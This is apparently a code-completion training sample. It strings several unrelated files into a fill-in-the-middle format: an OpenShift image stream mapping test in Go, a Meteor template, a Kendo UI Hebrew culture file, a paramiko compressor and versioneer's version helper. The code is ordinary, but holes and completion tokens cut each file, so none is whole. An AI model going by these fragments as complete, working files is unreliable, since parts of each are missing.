ObjectMeta: metav1.ObjectMeta{
Name: "existingImage",
Namespace: "default",
},
DockerImageReference: "localhost:5000/someproject/somerepo@" + testImageID,
DockerImageMetadata: imageapi.DockerImage{
Config: &imageapi.DockerConfig{
Cmd: []string{"ls", "/"},
Env: []string{"a=1"},
ExposedPorts: map[string]struct{}{"1234/tcp": {}},
Memory: 1234,
CPUShares: 99,
WorkingDir: "/workingDir",
},
},
}
client, server, storage := setup(t)
defer server.Terminate(t)
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/somerepo"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingRepo),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
_, err = client.Put(
context.TODO(),
etcdtest.AddPrefix("/images/default/existingImage"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), existingImage),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
mapping := imageapi.ImageStreamMapping{
Image: *existingImage,
Tag: "existingTag",
}
_, err = storage.Create(apirequest.NewDefaultContext(), &mapping)
if !errors.IsInvalid(err) {
t.Fatalf("Unexpected non-error creating mapping: %#v", err)
}
}
func TestTrackingTags(t *testing.T) {
client, server, storage := setup(t)
defer server.Terminate(t)
stream := &imageapi.ImageStream{
ObjectMeta: metav1.ObjectMeta{
Namespace: "default",
Name: "stream",
},
Spec: imageapi.ImageStreamSpec{
Tags: map[string]imageapi.TagReference{
"tracking": {
From: &kapi.ObjectReference{
Kind: "ImageStreamTag",
Name: "2.0",
},
},
"tracking2": {
From: &kapi.ObjectReference{
Kind: "ImageStreamTag",
Name: "2.0",
},
},
},
},
Status: imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"tracking": {
Items: []imageapi.TagEvent{
{
DockerImageReference: "foo/bar@sha256:1234",
Image: "1234",
},
},
},
"nontracking": {
Items: []imageapi.TagEvent{
{
DockerImageReference: "bar/baz@sha256:9999",
Image: "9999",
},
},
},
"2.0": {
Items: []imageapi.TagEvent{
{
DockerImageReference: "foo/bar@sha256:1234",
Image: "1234",
},
},
},
},
},
}
_, err := client.Put(
context.TODO(),
etcdtest.AddPrefix("/imagestreams/default/stream"),
runtime.EncodeOrDie(kapi.Codecs.LegacyCodec(v1.SchemeGroupVersion), stream),
)
if err != nil {
t.Fatalf("Unexpected error: %v", err)
}
image := &imageapi.Image{
ObjectMeta: metav1.ObjectMeta{
Name: "sha256:503c75e8121369581e5e5abe57b5a3f12db859052b217a8ea16eb86f4b5561a1",
},
DockerImageReference: "foo/bar@sha256:503c75e8121369581e5e5abe57b5a3f12db859052b217a8ea16eb86f4b5561a1",
}
mapping := imageapi.ImageStreamMapping{
ObjectMeta: metav1.ObjectMeta{
Namespace: "default",
Name: "stream",
},
Image: *image,
Tag: "2.0",
}
ctx := apirequest.WithUser(apirequest.NewDefaultContext(), &user.DefaultInfo{})
_, err = storage.Create(ctx, &mapping)
if err != nil {
t.Fatalf("Unexpected error creating mapping: %v", err)
}
stream, err = storage.imageStreamRegistry.GetImageStream(apirequest.NewDefaultContext(), "stream", &metav1.GetOptions{})
if err != nil {
t.Fatalf("error extracting updated stream: %v", err)
}
for _, trackingTag := range []string{"tracking", "tracking2"} {
tracking := imageapi.LatestTaggedImage(stream, trackingTag)
if tracking == nil {
t.Fatalf("unexpected nil %s TagEvent", trackingTag)
}
if e, a := image.DockerImageReference, tracking.DockerImageReference; e != a {
t.Errorf("dockerImageReference: expected %s, got %s", e, a)
}
if e, a := image.Name, tracking.Image; e != a {
t.Errorf("image: expected %s, got %s", e, a)
}
}
nonTracking := imageapi.LatestTaggedImage(stream, "nontracking")
if nonTracking == nil {
t.Fatal("unexpected nil nontracking TagEvent")
}
if e, a := "bar/baz@sha256:9999", nonTracking.DockerImageReference; e != a {
t.Errorf("dockerImageReference: expected %s, got %s", e, a)
}
if e, a := "9999", nonTracking.Image; e != a {
t.Errorf("image: expected %s, got %s", e, a)
}
}
// TestCreateRetryUnrecoverable ensures that an attempt to create a mapping
// using failing registry update calls will return an error.
func TestCreateRetryUnrecoverable(t *testing.T) {
rest := &REST{
strategy: NewStrategy(testDefaultRegistry),
imageRegistry: &fakeImageRegistry{
createImage: func(ctx apirequest.Context, image *imageapi.Image) error {
return nil
},
},
imageStreamRegistry: &fakeImageStreamRegistry{
getImageStream: func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error) {
return validImageStream(), nil
},
listImageStreams: func(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageStreamList, error) {
s := validImageStream()
return &imageapi.ImageStreamList{Items: []imageapi.ImageStream{*s}}, nil
},
updateImageStreamStatus: func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return nil, errors.NewServiceUnavailable("unrecoverable error")
},
},
}
obj, err := rest.Create(apirequest.NewDefaultContext(), validNewMappingWithName())
if err == nil {
t.Errorf("expected an error")
}
if obj != nil {
t.Fatalf("expected a nil result")
}
}
// TestCreateRetryConflictNoTagDiff ensures that attempts to create a mapping
// that result in resource conflicts that do NOT include tag diffs cause the
// create to be retried successfully.
func TestCreateRetryConflictNoTagDiff(t *testing.T) {
firstUpdate := true
rest := &REST{
strategy: NewStrategy(testDefaultRegistry),
imageRegistry: &fakeImageRegistry{
createImage: func(ctx apirequest.Context, image *imageapi.Image) error {
return nil
},
},
imageStreamRegistry: &fakeImageStreamRegistry{
getImageStream: func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error) {
stream := validImageStream()
stream.Status = imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"latest": {Items: []imageapi.TagEvent{{DockerImageReference: "localhost:5000/someproject/somerepo:original"}}},
},
}
return stream, nil
},
updateImageStreamStatus: func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
// For the first update call, return a conflict to cause a retry of an
// image stream whose tags haven't changed.
if firstUpdate {
firstUpdate = false
return nil, errors.NewConflict(imageapi.Resource("imagestreams"), repo.Name, fmt.Errorf("resource modified"))
}
return repo, nil
},
},
}
obj, err := rest.Create(apirequest.NewDefaultContext(), validNewMappingWithName())
if err != nil {
t.Errorf("unexpected error: %v", err)
}
if obj == nil {
t.Fatalf("expected a result")
}
}
// TestCreateRetryConflictTagDiff ensures that attempts to create a mapping
// that result in resource conflicts that DO contain tag diffs cause the
// conflict error to be returned.
func TestCreateRetryConflictTagDiff(t *testing.T) {
firstGet := true
firstUpdate := true
rest := &REST{
strategy: NewStrategy(testDefaultRegistry),
imageRegistry: &fakeImageRegistry{
createImage: func(ctx apirequest.Context, image *imageapi.Image) error {
return nil
},
},
imageStreamRegistry: &fakeImageStreamRegistry{
getImageStream: func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error) {
// For the first get, return a stream with a latest tag pointing to "original"
if firstGet {
firstGet = false
stream := validImageStream()
stream.Status = imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"latest": {Items: []imageapi.TagEvent{{DockerImageReference: "localhost:5000/someproject/somerepo:original"}}},
},
}
return stream, nil
}
// For subsequent gets, return a stream with the latest tag changed to "newer"
stream := validImageStream()
stream.Status = imageapi.ImageStreamStatus{
Tags: map[string]imageapi.TagEventList{
"latest": {Items: []imageapi.TagEvent{{DockerImageReference: "localhost:5000/someproject/somerepo:newer"}}},
},
}
return stream, nil
},
updateImageStreamStatus: func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
// For the first update, return a conflict so that the stream
// get/compare is retried.
if firstUpdate {
firstUpdate = false
return nil, errors.NewConflict(imageapi.Resource("imagestreams"), repo.Name, fmt.Errorf("resource modified"))
}
return repo, nil
},
},
}
obj, err := rest.Create(apirequest.NewDefaultContext(), validNewMappingWithName())
if err == nil {
t.Fatalf("expected an error")
}
if !errors.IsConflict(err) {
t.Errorf("expected a conflict error, got %v", err)
}
if obj != nil {
t.Fatalf("expected a nil result")
}
}
type fakeImageRegistry struct {
listImages func(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageList, error)
getImage func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.Image, error)
createImage func(ctx apirequest.Context, image *imageapi.Image) error
deleteImage func(ctx apirequest.Context, id string) error
watchImages func(ctx apirequest.Context, options *metainternal.ListOptions) (watch.Interface, error)
updateImage func(ctx apirequest.Context, image *imageapi.Image) (*imageapi.Image, error)
}
func (f *fakeImageRegistry) ListImages(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageList, error) {
return f.listImages(ctx, options)
}
func (f *fakeImageRegistry) GetImage(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.Image, error) {
return f.getImage(ctx, id, options)
}
func (f *fakeImageRegistry) CreateImage(ctx apirequest.Context, image *imageapi.Image) error {
return f.createImage(ctx, image)
}
func (f *fakeImageRegistry) DeleteImage(ctx apirequest.Context, id string) error {
return f.deleteImage(ctx, id)
}
func (f *fakeImageRegistry) WatchImages(ctx apirequest.Context, options *metainternal.ListOptions) (watch.Interface, error) {
return f.watchImages(ctx, options)
}
func (f *fakeImageRegistry) UpdateImage(ctx apirequest.Context, image *imageapi.Image) (*imageapi.Image, error) {
return f.updateImage(ctx, image)
}
type fakeImageStreamRegistry struct {
listImageStreams func(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageStreamList, error)
getImageStream func(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error)
createImageStream func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error)
updateImageStream func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error)
updateImageStreamSpec func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error)
updateImageStreamStatus func(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error)
deleteImageStream func(ctx apirequest.Context, id string) (*metav1.Status, error)
watchImageStreams func(ctx apirequest.Context, options *metainternal.ListOptions) (watch.Interface, error)
}
func (f *fakeImageStreamRegistry) ListImageStreams(ctx apirequest.Context, options *metainternal.ListOptions) (*imageapi.ImageStreamList, error) {
return f.listImageStreams(ctx, options)
}
func (f *fakeImageStreamRegistry) GetImageStream(ctx apirequest.Context, id string, options *metav1.GetOptions) (*imageapi.ImageStream, error) {
return f.getImageStream(ctx, id, options)
}
func (f *fakeImageStreamRegistry) CreateImageStream(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return f.createImageStream(ctx, repo)
}
func (f *fakeImageStreamRegistry) UpdateImageStream(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return f.updateImageStream(ctx, repo)
}
func (f *fakeImageStreamRegistry) UpdateImageStreamSpec(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return f.updateImageStreamSpec(ctx, repo)
}
func (f *fakeImageStreamRegistry) UpdateImageStreamStatus(ctx apirequest.Context, repo *imageapi.ImageStream) (*imageapi.ImageStream, error) {
return f.updateImageStreamStatus(ctx, repo)
}
func (f *fakeImageStreamRegistry) DeleteImageStream(ctx apirequest.Context, id string) (*metav1.Status, error) {
return f.deleteImageStream(ctx, id)
}
func (f *fakeImageStreamRegistry) WatchImageStreams(ctx apirequest.Context, options *metainternal.ListOptions) (watch.Interface, error) {
return f.watchImageStreams(ctx, options)
}<|fim▁end|>
|
Annotations: map[string]string{imageapi.ManagedByOpenShiftAnnotation: "true"},
|
<|file_name|>post_submit.js<|end_file_name|><|fim▁begin|>Template.postSubmit.onCreated(function() {
Session.set('postSubmitErrors', {});
});
Template.postSubmit.helpers({
errorMessage: function(field) {
return Session.get('postSubmitErrors')[field];
},
errorClass: function (field) {
return !!Session.get('postSubmitErrors')[field] ? 'has-error' : '';
}
});
Template.postSubmit.onRendered(function(){
// AutoForm.hooks({
// postSubmitForm: hooksObject
// });
<|fim▁hole|>
// Template.postSubmit.events({
// 'submit form': function(e) {
// e.preventDefault();
// var post = {
// url: $(e.target).find('[name=url]').val(),
// title: $(e.target).find('[name=title]').val()
// };
// var errors = validatePost(post);
// if (errors.title || errors.url)
// return Session.set('postSubmitErrors', errors);
// Meteor.call('postInsert', post, function(error, result) {
// // display the error to the user and abort
// if (error)
// return throwError(error.reason);
// // show this result but route anyway
// if (result.postExists)
// throwError('This link has already been posted');
// Router.go('postPage', {_id: result._id});
// });
// }
// });<|fim▁end|>
|
});
|
<|file_name|>kendo.culture.he.js<|end_file_name|><|fim▁begin|>/*
* Kendo UI Web v2014.1.318 (http://kendoui.com)
* Copyright 2014 Telerik AD. All rights reserved.
*
* Kendo UI Web commercial licenses may be obtained at
* http://www.telerik.com/purchase/license-agreement/kendo-ui-web
* If you do not own a commercial license, this file shall be governed by the
* GNU General Public License (GPL) version 3.
* For GPL requirements, please review: http://www.gnu.org/copyleft/gpl.html
*/
(function(f, define){
define([], f);
})(function(){
(function( window, undefined ) {
var kendo = window.kendo || (window.kendo = { cultures: {} });
kendo.cultures["he"] = {
name: "he",
numberFormat: {
pattern: ["-n"],
decimals: 2,
",": ",",
".": ".",
groupSize: [3],
percent: {
pattern: ["-n%","n%"],
decimals: 2,
",": ",",
".": ".",
groupSize: [3],
symbol: "%"
},<|fim▁hole|> pattern: ["$-n","$ n"],
decimals: 2,
",": ",",
".": ".",
groupSize: [3],
symbol: "₪"
}
},
calendars: {
standard: {
days: {
names: ["יום ראשון","יום שני","יום שלישי","יום רביעי","יום חמישי","יום שישי","שבת"],
namesAbbr: ["יום א","יום ב","יום ג","יום ד","יום ה","יום ו","שבת"],
namesShort: ["א","ב","ג","ד","ה","ו","ש"]
},
months: {
names: ["ינואר","פברואר","מרץ","אפריל","מאי","יוני","יולי","אוגוסט","ספטמבר","אוקטובר","נובמבר","דצמבר",""],
namesAbbr: ["ינו","פבר","מרץ","אפר","מאי","יונ","יול","אוג","ספט","אוק","נוב","דצמ",""]
},
AM: ["AM","am","AM"],
PM: ["PM","pm","PM"],
patterns: {
d: "dd/MM/yyyy",
D: "dddd dd MMMM yyyy",
F: "dddd dd MMMM yyyy HH:mm:ss",
g: "dd/MM/yyyy HH:mm",
G: "dd/MM/yyyy HH:mm:ss",
m: "dd MMMM",
M: "dd MMMM",
s: "yyyy'-'MM'-'dd'T'HH':'mm':'ss",
t: "HH:mm",
T: "HH:mm:ss",
u: "yyyy'-'MM'-'dd HH':'mm':'ss'Z'",
y: "MMMM yyyy",
Y: "MMMM yyyy"
},
"/": "/",
":": ":",
firstDay: 0
}
}
}
})(this);
return window.kendo;
}, typeof define == 'function' && define.amd ? define : function(_, f){ f(); });<|fim▁end|>
|
currency: {
|
<|file_name|>compress.py<|end_file_name|><|fim▁begin|># Copyright (C) 2003-2007 Robey Pointer <[email protected]>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,<|fim▁hole|>"""
import zlib
class ZlibCompressor (object):
def __init__(self):
self.z = zlib.compressobj(9)
def __call__(self, data):
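        # Z_FULL_FLUSH emits all pending output on every call, so each
        # returned chunk is complete and can be decoded by the peer as soon
        # as it arrives (per-packet compression for the Transport)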
return self.z.compress(data) + self.z.flush(zlib.Z_FULL_FLUSH)
class ZlibDecompressor (object):
def __init__(self):
self.z = zlib.decompressobj()
def __call__(self, data):
return self.z.decompress(data)<|fim▁end|>
|
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Compression implementations for a Transport.
|
<|file_name|>product.socket.js<|end_file_name|><|fim▁begin|>"use strict";
/**<|fim▁hole|>// Model events to emit
var events = ['save', 'remove'];
function register(socket) {
// Bind model events to socket events
for (var i = 0, eventsLength = events.length; i < eventsLength; i++) {
var event = events[i];
var listener = createListener('product:' + event, socket);
product_events_1.default.on(event, listener);
socket.on('disconnect', removeListener(event, listener));
}
}
exports.register = register;
function createListener(event, socket) {
return function (doc) {
socket.emit(event, doc);
};
}
function removeListener(event, listener) {
return function () {
product_events_1.default.removeListener(event, listener);
};
}
//# sourceMappingURL=product.socket.js.map<|fim▁end|>
|
* Broadcast updates to client when the model changes
*/
Object.defineProperty(exports, "__esModule", { value: true });
var product_events_1 = require("./product.events");
|
<|file_name|>_version.py<|end_file_name|><|fim▁begin|># This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by github's download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = ""
cfg.tag_prefix = ""
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "datapoint/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:<|fim▁hole|> e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
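    # e.g. (hypothetical output) "v1.2.3-14-g2414721-dirty" parses to
    # TAG "v1.2.3", NUM 14, HEX "2414721", plus the "-dirty" suffix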
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
    Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
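    # fallback chain: expanded git-archive keywords, then "git describe" on a
    # checkout, then the parent directory name, else version "0+unknown"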
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
